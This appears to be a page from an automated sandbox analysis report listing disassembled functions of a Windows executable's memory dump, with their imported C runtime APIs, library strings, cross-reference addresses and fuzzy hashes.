Instruction Fuzzy Hash: 72313272B04B50CEFB50DFA9E8543AD33B5E704788F644128DA4C6BB98CF389A119B90

Function 00007FF72A075B70 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A075BF2

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF72A075D05, 00007FF72A075D5F, 00007FF72A075DAF
string::string, xrefs: 00007FF72A075DA8
basic_string::_M_create, xrefs: 00007FF72A075C0A, 00007FF72A075CBA
basic_string::basic_string, xrefs: 00007FF72A075CFE, 00007FF72A075D58

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 3510742995-126128797
Opcode ID: 27880dd7a50bb7ebc01d8a8b18d1c7de1befbfbd7983a268b24b76310a416573
Instruction ID: f5153b797066bfc3e211a00785992f6bdfa3208da42448fd83fb9263a0d2a7ed
Opcode Fuzzy Hash: 27880dd7a50bb7ebc01d8a8b18d1c7de1befbfbd7983a268b24b76310a416573
Instruction Fuzzy Hash: F8519273B09B4284FB21AF65EC806ACB364E715F98F949172CA5C07395EE39D992C710

Function 00007FF72A075120 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000000,00000000,00007FF729FB8CDF,?,?,?,?,?,?,00000000,?,00007FF729FA8E93), ref: 00007FF72A0751A2

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF72A0752B5, 00007FF72A07530F, 00007FF72A07535F
string::string, xrefs: 00007FF72A075358
basic_string::_M_create, xrefs: 00007FF72A0751BA, 00007FF72A07526A
basic_string::basic_string, xrefs: 00007FF72A0752AE, 00007FF72A075308

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 3510742995-126128797
Opcode ID: e2845378e4123b13abf0210f9dd79c6ee0a1ac215ef50119aed81cdf3020174e
Instruction ID: c78b1640e62fa9c3c628f67e0edb7fa4d6d26f1058ce29b89b6259ff2981c504
Opcode Fuzzy Hash: e2845378e4123b13abf0210f9dd79c6ee0a1ac215ef50119aed81cdf3020174e
Instruction Fuzzy Hash: CA51B373B09B8280FB21AF65EC402ACB364E715F98F949172CA5C07395EE38E993C710

Function 00007FF72A077DF0 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 164COMMON

Download Yara Rule

APIs

wcslen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF72A077E03

Part of subcall function 00007FF72A0764D0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00007FF729FD4D48), ref: 00007FF72A076562
Part of subcall function 00007FF72A0764D0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00007FF729FD4D48), ref: 00007FF72A076585

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF72A077FCC
basic_string::replace, xrefs: 00007FF72A077E32, 00007FF72A077E78, 00007FF72A077EBC, 00007FF72A077F35
basic_string::insert, xrefs: 00007FF72A077F1C, 00007FF72A077F7C
basic_string::replace, xrefs: 00007FF72A077FC5
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF72A077E39, 00007FF72A077E7F, 00007FF72A077EC3, 00007FF72A077F23, 00007FF72A077F3C, 00007FF72A077F83

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy$wcslen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace$basic_string::replace
API String ID: 1844840824-3350440205
Opcode ID: 6c0195795bb4533eb4a6dba330c2b5e75ffbc706ba8ddfa38d83fc91dad8c8bc
Instruction ID: c4250f8f5584ddf03acc4c3f454a7881c57a4908bb01ea8230815c51234683be
Opcode Fuzzy Hash: 6c0195795bb4533eb4a6dba330c2b5e75ffbc706ba8ddfa38d83fc91dad8c8bc
Instruction Fuzzy Hash: 9541D552B05A9781FB20FBA5ED118B9A311EB69BC4FC055B1EA4C03761FE3CE645CB10

Function 00007FF729F8C220 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 183COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00007FF729F8C557), ref: 00007FF729F8C273

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF729F8C454
Mingw-w64 runtime failure:, xrefs: 00007FF729F8C25B
Address %p has no image-section, xrefs: 00007FF729F8C357
VirtualProtect failed with code 0x%x, xrefs: 00007FF729F8C548

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: __acrt_iob_func
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 711238415-1534286854
Opcode ID: cd10f0ef7a6ea509f53a95e70f294f78c7a81a764840871de163e2df2c3c0a85
Instruction ID: 4e383cfc30cd930f75c55f5f9a11d786c3b580e4af1addd6bc927d6c037fba45
Opcode Fuzzy Hash: cd10f0ef7a6ea509f53a95e70f294f78c7a81a764840871de163e2df2c3c0a85
Instruction Fuzzy Hash: 2C7149A2F05B068AEB94DB55EC812A8A3B1FB58BC4F944035DE0C97754EF3CEA01DB50

Function 00007FF729FB3E60 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 182stringCOMMON

Download Yara Rule

APIs

strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF729FB3EE6

Strings

chunk_len == 0, xrefs: 00007FF729FB4031
/mingw/include/httplib.h, xrefs: 00007FF729FB4027

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: strtoul
String ID: /mingw/include/httplib.h$chunk_len == 0
API String ID: 3805803174-3103630078
Opcode ID: 5c64dcc224694101c24fa3a9f11db741598c88eed4ff1d7dab5289c0ddf78d9d
Instruction ID: 9942830b0a9782439fd7ab7415be99c4fea0b0e93dc75c8f54f1b8a0d36ac8a9
Opcode Fuzzy Hash: 5c64dcc224694101c24fa3a9f11db741598c88eed4ff1d7dab5289c0ddf78d9d
Instruction Fuzzy Hash: DD715E21F0974298FFA0EE619C643F9A375EB19788FC80075DE0D17796EE2CD6449B20

Function 00007FF729F9ECA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 42COMMON

Download Yara Rule

APIs

exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729F9ED17

Strings

(, xrefs: 00007FF729F9ECED
Assertion failed: (%s), file %s, line %d, xrefs: 00007FF729F9ED03
(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0), xrefs: 00007FF729F9ECFC
../../../mingw-w64-libraries/winpthreads/src/rwlock.c, xrefs: 00007FF729F9ECF5

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: exit
String ID: ($(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$../../../mingw-w64-libraries/winpthreads/src/rwlock.c$Assertion failed: (%s), file %s, line %d
API String ID: 2483651598-1678677298
Opcode ID: 3c16262fbe96be88181feed3cd21b7695a7f88826d3af0ec9749feff659bd2b0
Instruction ID: 2ea465010efe5cd057db6d63a559e67a4f4b071c7543f4ac5e11b0013a57da6e
Opcode Fuzzy Hash: 3c16262fbe96be88181feed3cd21b7695a7f88826d3af0ec9749feff659bd2b0
Instruction Fuzzy Hash: 1E115176A04B468AFB44EF29DC841A8B7B0FB84B84F848436D90C07365EE3CD6559B64

Function 00007FF72A07A6A0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

wcslen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF72A07A6B0
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A07A6FE
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A07A7C4

Strings

basic_string::append, xrefs: 00007FF72A07A758, 00007FF72A07A809, 00007FF72A07A8B9

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy$wcslen
String ID: basic_string::append
API String ID: 1844840824-3811946249
Opcode ID: 9c7915bd4ca8250153b5df61b8ce792e31d979da48148e3bcb6b46548892fbcf
Instruction ID: 2eeae22fb4a86c25560fa64ae9943c990428fe8a37df41bd8ae07c83e6c198c3
Opcode Fuzzy Hash: 9c7915bd4ca8250153b5df61b8ce792e31d979da48148e3bcb6b46548892fbcf
Instruction Fuzzy Hash: 6C518362B08A5380FB20AB66DC401BDA362EB45F94BD48272DE1D473D5EF3CD542C760

Function 00007FF72A0735E0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF72A0AD23A), ref: 00007FF72A073630
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A073700

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF72A073755
basic_string::append, xrefs: 00007FF72A07367B, 00007FF72A07374E, 00007FF72A073761, 00007FF72A07380B

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
API String ID: 3510742995-4063909124
Opcode ID: 6d406d1eca15f9b9f007d51335762189f405f530d7c79cdc67ffd738aba14ea4
Instruction ID: f2800c1a3a3fcb58f882f1c306a3283557501c91863144badb6451b9da698a9c
Opcode Fuzzy Hash: 6d406d1eca15f9b9f007d51335762189f405f530d7c79cdc67ffd738aba14ea4
Instruction Fuzzy Hash: CF51A3A2B08A8791FB30AF29DC505B8A750EB41F94FC482B2DE1D47791EE3DD542CB21

Function 00007FF729FD2BC0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 95stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF729FB152D), ref: 00007FF729FD2BE9
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,00007FF729FB152D), ref: 00007FF729FD2C0A
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,?,00007FF729FB152D), ref: 00007FF729FD2C96

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF729FD2C4B, 00007FF729FD2CD3
basic_string::compare, xrefs: 00007FF729FD2C44, 00007FF729FD2CCC

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 6a0a4d276924c77aacee2f4d304ff23adc5e3a689598d2db9c6d11ed37480923
Instruction ID: 6a7c213638a0a1e39fd1b0f23796ef5bbb6e63927ee73005116b3238c7f8edfa
Opcode Fuzzy Hash: 6a0a4d276924c77aacee2f4d304ff23adc5e3a689598d2db9c6d11ed37480923
Instruction Fuzzy Hash: 592105A2F0998741FF64BF26AD006E59250DF15BF0E9C4231EE2C4B7D1ED1CEB869620

Function 00007FF72A0B1490 Relevance: 7.6, APIs: 5, Instructions: 70stringCOMMON

Download Yara Rule

APIs

setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF72A0B14AC
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF72A0B14F3
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A0B1510
setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF72A0B1521
setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF72A0B154B

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: e445fc0b44ec2ffa3fdcd92ed46016b8cf808a53da8db7d5860cf8180c6e5591
Instruction ID: dc29e12d2adc25e39968a9a97141b6abfdb409139aa7824f6faa0abe69579237
Opcode Fuzzy Hash: e445fc0b44ec2ffa3fdcd92ed46016b8cf808a53da8db7d5860cf8180c6e5591
Instruction Fuzzy Hash: 9D11D082B0828244FA60BF666C046FAD656AB86BD4FC84036EE0C4B386DD3CD7459B20

Function 00007FF729FC7AB0 Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON

Download Yara Rule

APIs

setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF729FC7ACE
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FC7AD9
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF729FC7AF6
setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF729FC7B01
setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF729FC7B24

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: f01e851db0a52cbc10af4f68602d2f5a03049bdd4ad9841078bbb22f159cd59a
Instruction ID: d8057dc9f10f5d16cec2748f900b8090b88974580956cf51f1b1a183a10bf46c
Opcode Fuzzy Hash: f01e851db0a52cbc10af4f68602d2f5a03049bdd4ad9841078bbb22f159cd59a
Instruction Fuzzy Hash: BF01F752B0815200FAA8FE673D059BEC261AF4AFD4FC88035ED0D9B786DC3CD2425724

Function 00007FF72A033B20 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF729FBADC7), ref: 00007FF72A033B40
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF729FBADC7), ref: 00007FF72A033B44
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF729FBADC7), ref: 00007FF72A033B58
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF729FBADC7), ref: 00007FF72A033B70
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF729FBADC7), ref: 00007FF72A033B77

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: e6fb373ae49db40d69894a36c95eaa56178bddb1cabda2af5240b95fbc3f345f
Instruction ID: 8ca3e53090e5e236778707231dfd6bfb6d8d9bdd6b0ae22395870b7233f80a48
Opcode Fuzzy Hash: e6fb373ae49db40d69894a36c95eaa56178bddb1cabda2af5240b95fbc3f345f
Instruction Fuzzy Hash: 38F03172A0921985F7163F26AE40369B694EF94BD5F898071CF0C07390EA3C68828A21

Function 00007FF729F97FA0 Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

_configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729F97FD1
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729F97FD6
__p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729F97FE3
__p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FF729F97FF2
_set_new_mode.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF729F98010

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: __p___argc__p___argv__p__environ_configure_narrow_argv_set_new_mode
String ID:
API String ID: 556796188-0
